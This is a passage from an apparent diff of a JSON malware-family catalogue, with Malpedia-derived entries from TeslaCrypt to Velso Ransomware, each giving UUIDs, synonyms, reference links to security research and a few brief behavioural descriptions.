RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cryptesla" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", + "https://blogs.cisco.com/security/talos/teslacrypt", + "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", + "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", + "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", + "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", + "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", + "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" + ] + }, + "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", + "value": "TeslaCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Alphabot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos", + "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" + ] + }, + "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", + "value": "Thanatos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom", + "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/", + "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", + "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html" + ] + }, + "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", + "value": "Thanatos Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte", + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + ] + }, + "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", + "value": "ThreeByte", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief", + "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" + ] + }, + "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", + "value": "ThumbThief", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" + ] + }, + "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3", + "value": "Thunker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", + "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" + ] + }, + "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", + "value": "Tidepool", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Zusy", + "TinyBanker", + "Illi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", + "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/", + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", + "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", + "http://garage4hackers.com/entry.php?b=3086", + "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", + "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", + "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", + "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", + "http://contagiodump.blogspot.com/2012/06/amazon.html", + "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/" + ] + }, + "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", + "value": "Tinba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", + "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0" + ] + }, + "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", + "value": "TinyLoader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "NukeBot", + "Nuclear Bot", + "MicroBankingTrojan", + "Xbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", + "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", + "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", + "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", + "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", + "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", + "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", + "https://krebsonsecurity.com/tag/nuclear-bot/" + ] + }, + "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", + "value": "TinyNuke", + "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + ] + }, + "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", + "value": "TinyTyphon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", + "value": "TinyZbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" + ] + }, + "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", + "value": "Tiop", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Gheg" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", + "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/", + "https://www.cert.pl/en/news/single/tofsee-en/", + "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/" + ] + }, + "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", + "value": "Tofsee", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", + "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/", + "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/" + ] + }, + "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", + "value": "TorrentLocker", + "description": "" + }, + { + "meta": { + "synonyms": [ + "huntpos" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", + "http://adelmas.com/blog/treasurehunter.php", + "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", + "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html" + ] + }, + "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", + "value": "TreasureHunter", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Trickster", + "TheTrick", + "TrickLoader" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", + "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", + "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", + "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", + "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", + "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", + "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", + "https://www.youtube.com/watch?v=KMcSAlS9zGE", + "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", + "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", + "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", + "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", + "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", + "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", + "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", + "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", + "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", + "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", + "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", + "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", + "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", + "http://www.malware-traffic-analysis.net/2018/02/01/", + "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", + "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", + "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", + "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core", + "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", + "https://www.youtube.com/watch?v=EdchPEHnohw", + "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://www.youtube.com/watch?v=lTywPmZEU1A", + "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", + "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", + "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" + ] + }, + "uuid": "c824813c-9c79-4917-829a-af72529e8329", + "value": "TrickBot", + "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed" + }, + { + "meta": { + "synonyms": [ + "Trisis", + "HatMan" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", + "https://dragos.com/blog/trisis/TRISIS-01.pdf", + "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", + "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", + "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN" + ] + }, + "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", + "value": "win.triton", + "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/5loyd/trochilus/" + ] + }, + "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", + "value": "Trochilus RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Shade" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", + "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", + "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" + ] + }, + "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", + "value": "Troldesh", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom" + ] + }, + "uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb", + "value": "Trump Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri" + ] + }, + "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", + "value": "Tsifiri", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + ] + }, + "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", + "value": "TURNEDUP", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", + "https://www.lastline.com/labsblog/tyupkin-atm-malware/" + ] + }, + "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", + "value": "Tyupkin", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Akagi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", + "https://github.com/hfiref0x/UACME" + ] + }, + "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", + "value": "UACMe", + "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", + "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns", + "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html" + ] + }, + "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", + "value": "UDPoS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix", + "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" + ] + }, + "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", + "value": "Uiwix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" + ] + }, + "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", + "value": "Unidentified 001", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" + ] + }, + "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", + "value": "Unidentified 003", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005" + ] + }, + "uuid": "", + "value": "", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" + ] + }, + "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6", + "value": "Unidentified 006", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware", + "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" + ] + }, + "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", + "value": "Unidentified 013 (Korean)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7", + "https://wikileaks.org/ciav7p1/cms/page_34308128.html" + ] + }, + "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", + "value": "Unidentified 020 (Vault7)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom" + ] + }, + "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", + "value": "Unidentified 022 (Ransom)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" + ] + }, + "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", + "value": "Unidentified 023", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom", + "https://twitter.com/malwrhunterteam/status/789161704106127360" + ] + }, + "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", + "value": "Unidentified 024 (Ransomware)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud", + "http://malware-traffic-analysis.net/2016/05/09/index.html" + ] + }, + "uuid": "f43a0e38-2394-4538-a123-4a0457096058", + "value": "Unidentified 025 (Clickfraud)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028" + ] + }, + "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", + "value": "Unidentified 028", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029" + ] + }, + "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", + "value": "Unidentified 029", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", + "https://twitter.com/JaromirHorejsi/status/877811773826641920" + ] + }, + "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", + "value": "Filecoder", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" + ] + }, + "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", + "value": "Unidentified 031", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" + ] + }, + "uuid": "799921d7-48e8-47a6-989e-487b527af37a", + "value": "Unidentified 032", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" + ] + }, + "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", + "value": "Unidentified 033", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_034", + "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" + ] + }, + "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", + "value": "Unidentified 034", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035" + ] + }, + "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", + "value": "Unidentified 035", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" + ] + }, + "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", + "value": "Unidentified 037", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038" + ] + }, + "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", + "value": "Unidentified 038", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" + ] + }, + "uuid": "97c1524a-c052-49d1-8770-14b513d8a830", + "value": "Unidentified 039", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" + ] + }, + "uuid": "88d70171-fc89-44d1-8931-035c0b095247", + "value": "Unidentified 041", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042", + "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" + ] + }, + "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", + "value": "Unidentified 042", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" + ] + }, + "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", + "value": "Unidentified 044", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" + ] + }, + "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", + "value": "Unidentified 045", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", + "https://twitter.com/DrunkBinary/status/1006534471687004160" + ] + }, + "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", + "value": "Unidentified 046", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" + ] + }, + "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", + "value": "Unidentified 047", + "description": "RAT written in Delphi used by Patchwork APT." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", + "https://twitter.com/DrunkBinary/status/1002587521073721346" + ] + }, + "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", + "value": "Unidentified 048 (Lazarus?)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049", + "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" + ] + }, + "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", + "value": "Unidentified 049 (Lazarus/RAT)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051", + "https://twitter.com/CDA/status/1014144988454772736" + ] + }, + "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", + "value": "Unidentified 051", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052" + ] + }, + "uuid": "80c12fcd-e5ef-4549-860d-7928363022f9", + "value": "Unidentified 052", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053", + "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" + ] + }, + "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", + "value": "Unidentified 053 (Wonknu?)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92", + "https://twitter.com/struppigel/status/810753660737073153", + "https://twitter.com/bartblaze/status/976188821078462465" + ] + }, + "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6", + "value": "Unlock92", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Rombrast" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", + "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", + "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", + "https://twitter.com/ulexec/status/1005096227741020160" + ] + }, + "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd", + "value": "UPAS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", + "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", + "https://secrary.com/ReversingMalware/Upatre/" + ] + }, + "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", + "value": "Upatre", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" + ] + }, + "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7", + "value": "Urausy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bebloh", + "Shiotob" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", + "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", + "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", + "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", + "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", + "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", + "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", + "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" + ] + }, + "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", + "value": "UrlZone", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Snake" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos" + ] + }, + "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", + "value": "Uroburos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Catch", + "grabnew", + "NeverQuest" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", + "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", + "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", + "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", + "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + ] + }, + "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", + "value": "Vawtrak", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.velso", + "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" + ] + }, + "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", + "value": "Velso Ransomware", + "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. " + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 